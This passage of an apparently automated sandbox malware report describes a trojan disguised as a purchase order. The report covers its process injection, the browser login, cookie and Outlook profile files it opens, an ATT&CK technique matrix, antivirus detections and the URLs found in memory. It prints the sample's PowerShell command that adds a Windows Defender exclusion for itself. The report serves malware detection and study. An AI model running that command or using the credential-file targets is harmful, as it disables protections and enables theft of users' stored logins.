                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6A11F2Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A840CJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x69F0B5Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A12B1Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtResumeThread: Indirect: 0x4A93B00Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtSetContextThread: Indirect: 0x4A934E0Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x69F905Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x6A0C16Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x5F9B3B3Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x5FA2F6DJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtQueueApcThread: Indirect: 0x4A8F322Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x5F9B1F1Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x6A835DJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A12E0Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtClose: Indirect: 0x4A8F3A7
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A84B4Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6A04F2Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFC9B2E2651Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtSuspendThread: Indirect: 0x4A937F0Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x6AC0C6Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x6A8552
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A1324Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x6A9944Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory written: C:\Users\user\Desktop\PO 1202495088.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\PO 1202495088.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cttune.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cttune.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
                Source: C:\Windows\SysWOW64\cttune.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\cttune.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\cttune.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\PO 1202495088.exe | Thread register set: target process: 7500
                Source: C:\Windows\SysWOW64\cttune.exe | Thread register set: target process: 7500
                Source: C:\Windows\SysWOW64\cttune.exe | Thread register set: target process: 5316
                Source: C:\Users\user\Desktop\PO 1202495088.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                Source: C:\Users\user\Desktop\PO 1202495088.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: C:\Users\user\Desktop\PO 1202495088.exe | Process created: C:\Users\user\Desktop\PO 1202495088.exe "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"
                Source: C:\Windows\SysWOW64\cttune.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: RAVCpl64.exe, 0000000C.00000002.6025445964.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000000.1394714449.0000000000E41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: RAVCpl64.exe, 0000000C.00000002.6025445964.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000000.1394714449.0000000000E41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: RAVCpl64.exe, 0000000C.00000002.6025445964.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000000.1394714449.0000000000E41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: RAVCpl64.exe, 0000000C.00000002.6025445964.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000000.1394714449.0000000000E41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Managers
                Source: C:\Users\user\Desktop\PO 1202495088.exe | Queries volume information: C:\Users\user\Desktop\PO 1202495088.exe VolumeInformation
                Source: C:\Users\user\Desktop\PO 1202495088.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: unknown VolumeInformation
                Source: C:\Users\user\Desktop\PO 1202495088.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 4.2.PO 1202495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.PO 1202495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\cttune.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\cttune.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\cttune.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\cttune.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\cttune.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\cttune.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\cttune.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\cttune.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 4.2.PO 1202495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.PO 1202495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 131 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 51 Virtualization/Sandbox Evasion | Security Account Manager | 51 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 123 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                [Behavior graph: ID 1574077, Sample: PO 1202495088.exe, Startdate: 12/12/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                PO 1202495088.exe | 100% | Avira | HEUR/AGEN.1305388 |
                PO 1202495088.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
                PO 1202495088.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.google.com/images/branding/product/ico/googleg_alldp.icocttune.exe, 0000000D.00000003.1644119779.0000000007C22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://static.loopia.se/shared/logo/logo-loopia-white.svgRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/css/style-off-canvas.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/images/404.pngRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.inbulkses.shop/wp-includes/js/jquery/jquery.min.js?ver=3.7.1RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.inbulkses.shop/product-category/eco-sugarcane-products/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.inbulkses.shop/product-category/bakery-boxes/cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://rankmath.com/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.inbulkses.shop/wp-includes/js/wp-util.min.js?ver=6.7.1RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.inbulkses.shop/wp-content/uploads/2017/11/payment-icons.pngRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.inbulkses.shop/product-category/plastic-utensils/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.inbulkses.shop/wp-content/themes/elessi-theme/assets/css/style-mobile-menu.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.inbulkses.shop/wp-login.php?action=logout&amp;redirect_to=http%3A%2F%2Fwww.inbulkses.shopRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://static.loopia.se/shared/style/2022-extra-pages.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.inbulkses.shop/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://site.ip138.com/www.jyshe18.buzzRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007D3C000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005A8C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://static.loopia.se/responsive/images/iOS-114.pngRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icocttune.exe, 0000000D.00000003.1647938408.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drfalse
                                                                                      high
                                                                                      http://www.inbulkses.shop/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.1cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.inbulkses.shop/wp-admin/admin-ajax.phpRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-3715.css?ver=1733888756RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.inbulkses.shop/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.inbulkses.shop/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.25.10RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.inbulkses.shop/#websitecttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://static.loopia.se/responsive/styles/reset.cssRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.inbulkses.shop/wp-content/plugins/yith-woocommerce-compare/assets/js/woocompare.min.js?veRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.inbulkses.shop/wp-content/plugins/nasa-core/assets/js/min/nasa.script.min.jsRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://static.loopia.se/responsive/images/iOS-57.pngRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://g.live.com/odclientsettings/Prod/C:qmgr.db.5.drfalse
                                                                                        high
                                                                                        http://www.inbulkses.shop/product-category/paper-food-tray/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.inbulkses.shop/product-category/our-new-arrival/RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.inbulkses.shop/wp-content/plugins/nasa-core/assets/js/min/nasa.functions.min.jsRAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.inbulkses.shop/wp-content/plugins/elementor/assets/css/widget-heading.min.css?ver=3.25.10RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRAVCpl64.exe, 0000000C.00000002.6039735118.0000000007A18000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169360097.0000000007950000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000005768000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.inbulkses.shop/wp-content/uploads/elementor/css/post-3701.css?ver=1733888755RAVCpl64.exe, 0000000C.00000002.6039735118.0000000008E82000.00000004.80000000.00040000.00000000.sdmp, cttune.exe, 0000000D.00000002.5167744206.0000000006BD2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574077
Start date and time: 2024-12-12 21:50:01 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: PO 1202495088.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/9@18/13
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 86
• Number of non-executed functions: 281
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SgrmBroker.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.44.104.130
• Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
